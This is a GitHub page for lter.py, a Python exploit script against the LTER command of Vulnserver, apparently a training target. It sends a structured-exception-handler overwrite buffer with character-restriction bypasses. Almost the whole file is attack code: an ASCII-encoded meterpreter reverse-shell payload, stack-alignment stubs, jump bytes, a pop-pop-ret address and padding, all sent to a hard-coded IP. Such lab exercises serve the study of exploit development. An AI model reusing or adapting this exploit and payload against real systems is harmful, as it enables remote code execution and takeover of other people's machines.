-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathlter.py
171 lines (165 loc) · 11.3 KB
/
lter.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
#LTER Vulnserver Exploit
#Written by Elias Augusto
#SEH+Character Restrictions
from socket import *
s=socket(AF_INET,SOCK_STREAM)
s.connect(('192.168.101.146',9999)) #Our target
#Printable ASCII encoded meterpreter reverse shell
#Note - IP of reverse shell is currently a random IP
#Move stack from 0xXXXXFFD0 to 0xXXXXFDC4 and run reverse shell - problems are usually solved by moving buffer up.
scbuf ="\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x54\x58\x2d\x67\x28\x79"
scbuf+="\x77\x2d\x64\x79\x65\x29\x2d\x41\x60\x21\x5f\x50\x5C\x25\x50\x50"
scbuf+="\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x2b\x6f\x6f\x6f\x50\x25\x50\x50"
scbuf+="\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x43\x5d\x50\x57\x2d\x30\x61\x28"
scbuf+="\x2a\x2d\x23\x41\x34\x7f\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
scbuf+="\x2a\x2d\x7f\x6f\x7f\x2a\x2d\x39\x70\x7e\x26\x2d\x58\x6a\x5f\x58"
scbuf+="\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x21\x7a\x71\x6e"
scbuf+="\x2d\x29\x7a\x6f\x62\x2d\x41\x4a\x5b\x73\x50\x25\x50\x50\x50\x50"
scbuf+="\x25\x2a\x2a\x2a\x2a\x2d\x6c\x5f\x23\x7e\x2d\x2c\x6f\x45\x7e\x2d"
scbuf+="\x67\x6e\x6d\x3d\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d"
scbuf+="\x74\x63\x64\x60\x2d\x7f\x6a\x77\x25\x2d\x72\x32\x24\x7a\x50\x25"
scbuf+="\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x2d\x66\x4f\x74\x2d\x6f"
scbuf+="\x22\x60\x22\x2d\x65\x77\x50\x7f\x50\x25\x50\x50\x50\x50\x25\x2a"
scbuf+="\x2a\x2a\x2a\x2d\x7a\x78\x3d\x68\x2d\x62\x78\x3d\x27\x50\x25\x50"
scbuf+="\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x50\x28\x2a\x4f\x2d\x28\x4f"
scbuf+="\x76\x6c\x2d\x2a\x2a\x60\x37\x50\x25\x50\x50\x50\x50\x25\x2a\x2a"
scbuf+="\x2a\x2a\x2d\x2c\x23\x68\x71\x2d\x50\x4f\x68\x3b\x2d\x37\x2c\x30"
scbuf+="\x7d\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x60\x60\x22"
scbuf+="\x4f\x2d\x49\x37\x68\x42\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
scbuf+="\x2a\x2d\x41\x42\x67\x7f\x2d\x33\x42\x39\x2b\x2d\x7d\x4b\x60\x7f"
scbuf+="\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x79\x6f\x7f\x7f"
scbuf+="\x2d\x37\x28\x75\x51\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
scbuf+="\x2d\x6f\x6a\x28\x27\x2d\x6f\x5f\x2a\x7f\x2d\x22\x36\x43\x59\x50"
scbuf+="\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x31\x24\x58\x4f\x2d"
scbuf+="\x35\x52\x6c\x45\x2d\x42\x21\x3b\x2b\x50\x25\x50\x50\x50\x50\x25"
scbuf+="\x2a\x2a\x2a\x2a\x2d\x39\x38\x21\x22\x2d\x68\x4d\x2a\x50\x2d\x67"
scbuf+="\x79\x37\x65\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x4f"
scbuf+="\x7f\x72\x22\x2d\x21\x21\x4f\x21\x2d\x31\x60\x68\x38\x50\x25\x50"
scbuf+="\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x41\x7c\x75\x7c\x2d\x30\x38"
scbuf+="\x79\x3e\x2d\x27\x49\x38\x7c\x50\x25\x50\x50\x50\x50\x25\x2a\x2a"
scbuf+="\x2a\x2a\x2d\x68\x50\x60\x21\x2d\x60\x21\x24\x27\x2d\x38\x38\x28"
scbuf+="\x60\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x73\x7d\x60"
scbuf+="\x21\x2d\x50\x6f\x24\x42\x2d\x68\x7f\x27\x32\x50\x25\x50\x50\x50"
scbuf+="\x50\x25\x2a\x2a\x2a\x2a\x2d\x7e\x43\x7d\x5e\x2d\x60\x41\x22\x42"
scbuf+="\x2d\x7e\x27\x7b\x5f\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
scbuf+="\x2d\x30\x54\x2a\x21\x2d\x28\x68\x27\x4f\x2d\x3e\x43\x46\x37\x50"
scbuf+="\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x7d\x44\x5a\x4f\x2d"
scbuf+="\x3d\x6b\x28\x2a\x2d\x36\x50\x7d\x30\x50\x25\x50\x50\x50\x50\x25"
scbuf+="\x2a\x2a\x2a\x2a\x2d\x41\x62\x28\x60\x2d\x30\x30\x48\x4a\x2d\x25"
scbuf+="\x2d\x27\x55\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x61"
scbuf+="\x76\x22\x62\x2d\x21\x53\x52\x67\x50\x25\x50\x50\x50\x50\x25\x2a"
scbuf+="\x2a\x2a\x2a\x2d\x4c\x7d\x56\x27\x2d\x60\x7f\x39\x6f\x2d\x7f\x7f"
scbuf+="\x77\x68\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x7e\x50"
scbuf+="\x25\x7f\x2d\x34\x68\x22\x23\x2d\x75\x7e\x58\x5e\x50\x25\x50\x50"
scbuf+="\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x6f\x4f\x22\x7f\x2d\x3b\x59\x75"
scbuf+="\x7e\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x21\x7a\x41"
scbuf+="\x24\x2d\x50\x4f\x22\x66\x2d\x25\x36\x32\x71\x50\x25\x50\x50\x50"
scbuf+="\x50\x25\x2a\x2a\x2a\x2a\x2d\x36\x68\x70\x5b\x2d\x28\x38\x2a\x2c"
scbuf+="\x2d\x3b\x5f\x65\x78\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
scbuf+="\x2d\x51\x22\x53\x78\x2d\x44\x41\x60\x5b\x2d\x63\x27\x60\x43\x50"
scbuf+="\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x21\x2c\x72\x3e\x2d"
scbuf+="\x41\x4c\x30\x4f\x2d\x2a\x7d\x5e\x23\x50\x25\x50\x50\x50\x50\x25"
scbuf+="\x2a\x2a\x2a\x2a\x2d\x71\x6f\x7f\x41\x2d\x30\x51\x7f\x7e\x2d\x60"
scbuf+="\x69\x7b\x7f\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x23"
scbuf+="\x30\x47\x4f\x2d\x44\x2a\x44\x4f\x50\x25\x50\x50\x50\x50\x25\x2a"
scbuf+="\x2a\x2a\x2a\x2d\x79\x74\x71\x6f\x2d\x77\x35\x37\x28\x50\x25\x50"
scbuf+="\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x58\x38\x7c\x38\x2d\x39\x79"
scbuf+="\x7e\x29\x2d\x70\x78\x6d\x33\x50\x25\x50\x50\x50\x50\x25\x2a\x2a"
scbuf+="\x2a\x2a\x2d\x65\x3e\x31\x70\x2d\x7f\x3e\x7f\x4f\x2d\x32\x73\x70"
scbuf+="\x5f\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x6f\x6f\x7f"
scbuf+="\x5f\x2d\x41\x50\x30\x38\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
scbuf+="\x2a\x2d\x6f\x7f\x7f\x6f\x2d\x41\x30\x30\x50\x50\x25\x50\x50\x50"
scbuf+="\x50\x25\x2a\x2a\x2a\x2a\x2d\x6f\x7f\x7f\x60\x2d\x61\x77\x2d\x27"
scbuf+="\x2d\x75\x7f\x6c\x27\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
scbuf+="\x2d\x23\x5f\x76\x76\x2d\x44\x4d\x2a\x2a\x2d\x31\x51\x5f\x5e\x50"
scbuf+="\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x6d\x7f\x24\x3c\x2d"
scbuf+="\x56\x59\x4f\x28\x2d\x7d\x7e\x27\x74\x50\x25\x50\x50\x50\x50\x25"
scbuf+="\x2a\x2a\x2a\x2a\x2d\x60\x22\x26\x21\x2d\x50\x42\x55\x23\x2d\x7b"
scbuf+="\x30\x7a\x53\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x22"
scbuf+="\x46\x74\x70\x2d\x23\x27\x5a\x30\x2d\x3b\x27\x31\x60\x50\x25\x50"
scbuf+="\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x35\x30\x6f\x7f\x2d\x77\x7f"
scbuf+="\x28\x57\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x71\x7b"
scbuf+="\x27\x74\x2d\x30\x24\x3c\x5f\x2d\x5f\x60\x73\x68\x50\x25\x50\x50"
scbuf+="\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x7f\x7f\x7f\x7f\x2d\x7f\x62\x7f"
scbuf+="\x22\x2d\x32\x65\x70\x5c\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
scbuf+="\x2a\x2d\x43\x2d\x43\x61\x2d\x60\x26\x5b\x21\x2d\x56\x23\x79\x7d"
scbuf+="\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x48\x5f\x28\x66"
scbuf+="\x2d\x50\x54\x60\x73\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
scbuf+="\x2d\x41\x78\x50\x31\x2d\x4c\x55\x50\x7a\x50\x25\x50\x50\x50\x50"
scbuf+="\x25\x2a\x2a\x2a\x2a\x2d\x70\x24\x24\x27\x2d\x34\x5c\x2a\x24\x2d"
scbuf+="\x5c\x7f\x49\x3d\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d"
scbuf+="\x2a\x6f\x6f\x6f\x2d\x79\x28\x5d\x5e\x50\x25\x50\x50\x50\x50\x25"
scbuf+="\x2a\x2a\x2a\x2a\x2d\x30\x4f\x78\x78\x2d\x24\x21\x48\x7f\x2d\x21"
scbuf+="\x7d\x54\x7a\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x70"
scbuf+="\x27\x27\x60\x2d\x50\x3d\x41\x24\x2d\x60\x3b\x38\x21\x50\x25\x50"
scbuf+="\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x27\x58\x45\x50\x2d\x50\x28"
scbuf+="\x42\x50\x2d\x30\x25\x27\x60\x50\x25\x50\x50\x50\x50\x25\x2a\x2a"
scbuf+="\x2a\x2a\x2d\x7f\x6f\x6f\x41\x2d\x5d\x35\x35\x5d\x50\x25\x50\x50"
scbuf+="\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x7e\x7f\x3e\x60\x2d\x38\x79\x2d"
scbuf+="\x2b\x2d\x7a\x7d\x4f\x50\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
scbuf+="\x2a\x2d\x30\x7c\x22\x7f\x2d\x45\x7f\x52\x7f\x50\x25\x50\x50\x50"
scbuf+="\x50\x25\x2a\x2a\x2a\x2a\x2d\x30\x21\x60\x4f\x2d\x50\x48\x48\x61"
scbuf+="\x2d\x28\x7a\x56\x7c\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
scbuf+="\x2d\x43\x79\x62\x4f\x2d\x32\x7a\x52\x25\x50\x25\x50\x50\x50\x50"
scbuf+="\x25\x2a\x2a\x2a\x2a\x2d\x6f\x7f\x77\x27\x2d\x30\x43\x37\x2a\x2d"
scbuf+="\x3d\x3c\x7e\x47\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d"
scbuf+="\x45\x2a\x2d\x60\x2d\x60\x4f\x23\x21\x2d\x77\x2d\x24\x26\x50\x25"
scbuf+="\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x7f\x4f\x7f\x22\x2d\x46"
scbuf+="\x33\x5c\x68\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x70"
scbuf+="\x26\x23\x67\x2d\x28\x57\x24\x38\x2d\x72\x7e\x3b\x68\x50\x25\x50"
scbuf+="\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x5a\x21\x5a\x22\x2d\x60\x41"
scbuf+="\x57\x44\x2d\x7f\x64\x6e\x23\x50\x25\x50\x50\x50\x50\x25\x2a\x2a"
scbuf+="\x2a\x2a\x2d\x78\x38\x6a\x60\x2d\x68\x79\x2c\x26\x2d\x5f\x7e\x5b"
scbuf+="\x78\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x3d\x28\x4d"
scbuf+="\x7d\x2d\x70\x45\x3b\x73\x2d\x7d\x60\x78\x62\x50\x25\x50\x50\x50"
scbuf+="\x50\x25\x2a\x2a\x2a\x2a\x2d\x4f\x5f\x2a\x7f\x2d\x26\x6c\x4a\x7f"
scbuf+="\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x44\x7e\x4f\x4c"
scbuf+="\x2d\x2a\x3e\x21\x26\x2d\x7a\x60\x54\x44\x50\x25\x50\x50\x50\x50"
scbuf+="\x25\x2a\x2a\x2a\x2a\x2d\x38\x67\x21\x3d\x2d\x48\x7f\x22\x3d\x2d"
scbuf+="\x7f\x46\x30\x3c\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d"
scbuf+="\x3b\x2a\x6f\x6f\x2d\x74\x4a\x37\x70\x50\x25\x50\x50\x50\x50\x25"
scbuf+="\x2a\x2a\x2a\x2a\x2d\x5d\x33\x57\x7f\x2d\x7c\x5c\x28\x35\x2d\x44"
scbuf+="\x27\x7f\x7a\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x4f"
scbuf+="\x4f\x70\x22\x2d\x26\x64\x7e\x65\x50\x25\x50\x50\x50\x50\x25\x2a"
scbuf+="\x2a\x2a\x2a\x2d\x7a\x3b\x77\x71\x2d\x76\x39\x3e\x52\x50\x25\x50"
scbuf+="\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x5a\x4a\x37\x32\x2d\x54\x5e"
scbuf+="\x3d\x7b\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x48\x43"
scbuf+="\x70\x64\x2d\x38\x79\x48\x2a\x2d\x7f\x7c\x64\x7e\x50\x25\x50\x50"
scbuf+="\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x25\x6b\x38\x26\x2d\x3d\x54\x78"
scbuf+="\x6f\x2d\x7e\x7f\x7f\x5c\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
scbuf+="\x2a\x2d\x6f\x30\x7f\x7f\x2d\x30\x53\x7e\x54\x50\x25\x50\x50\x50"
scbuf+="\x50\x25\x2a\x2a\x2a\x2a\x2d\x23\x7e\x71\x22\x2d\x2d\x32\x72\x22"
scbuf+="\x2d\x7f\x50\x6f\x7e\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
scbuf+="\x2d\x7a\x24\x36\x7b\x2d\x77\x24\x7f\x5e\x50\x25\x50\x50\x50\x50"
scbuf+="\x25\x2a\x2a\x2a\x2a\x2d\x75\x25\x21\x75\x2d\x77\x4f\x6c\x62\x50"
scbuf+="\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x4f\x79\x30\x34\x2d"
scbuf+="\x5f\x7a\x44\x79\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d"
scbuf+="\x53\x5f\x72\x21\x2d\x22\x50\x5d\x53\x50\x25\x50\x50\x50\x50\x25"
scbuf+="\x2a\x2a\x2a\x2a\x2d\x7e\x21\x60\x27\x2d\x60\x4a\x6f\x46\x2d\x3d"
scbuf+="\x62\x70\x2d\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x60"
scbuf+="\x60\x3c\x7f\x2d\x32\x2c\x26\x7f\x2d\x6e\x73\x3d\x78\x50\x25\x50"
scbuf+="\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x25\x54\x22\x47\x2d\x60\x43"
scbuf+="\x28\x67\x2d\x7f\x7f\x32\x51\x50"
#What spike put before our A's
buffer="LTER /.../"
#Total Buffer length after /.../ is 5000
#Offset is 3518 - 4 for NSEH
#Now we attempt to find our badchar free buffer
buffer+=scbuf #2120 byte ASCII encoded msfvenom meterpreter reverse shell - generated by opt_encoder.py
buffer+="C"*1276 #C Buffer - Our unencoded shellcode is only 324 bytes so it's fine
#Code that performs: Push ESP, Pop ESI, Encoded add SI,3DEh and JMP ESI - 83 bytes
buffer+="\x54\x5e" #Push ESP, Pop ESI
buffer+="\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x54\x58\x2d\x78\x61\x6f" #Move stack from 0xXXXXEE44 to 0xXXXXFFD8 and start writing Shellcode
buffer+="\x73\x2d\x7a\x22\x30\x3d\x2d\x7a\x6a\x60\x4f\x50\x5C\x25\x50\x50"
buffer+="\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x3c\x60\x7d\x21\x2d\x42\x50\x3b"
buffer+="\x22\x2d\x7f\x50\x60\x2b\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
buffer+="\x2a\x2d\x30\x2d\x68\x7f\x2d\x3e\x25\x5c\x26\x2d\x2c\x2c\x75\x7b"
buffer+="\x50"
buffer+="C"*35
buffer+="\x71\x06\x70\x04" #nSEH
#Instructions: JNO 06 JO 04. Actual flag position doesn't matter, since the jump will be taken either way
buffer+="\x5E\x19\x50\x62" #pop pop ret
buffer+="\x71\xFF" #Jump ~128 bytes backwards, overflow flag isn't set at this point, filter translated to 7180 (JNO -128)
buffer+="C"*1474 #Dead space
s.send(buffer)
s.close()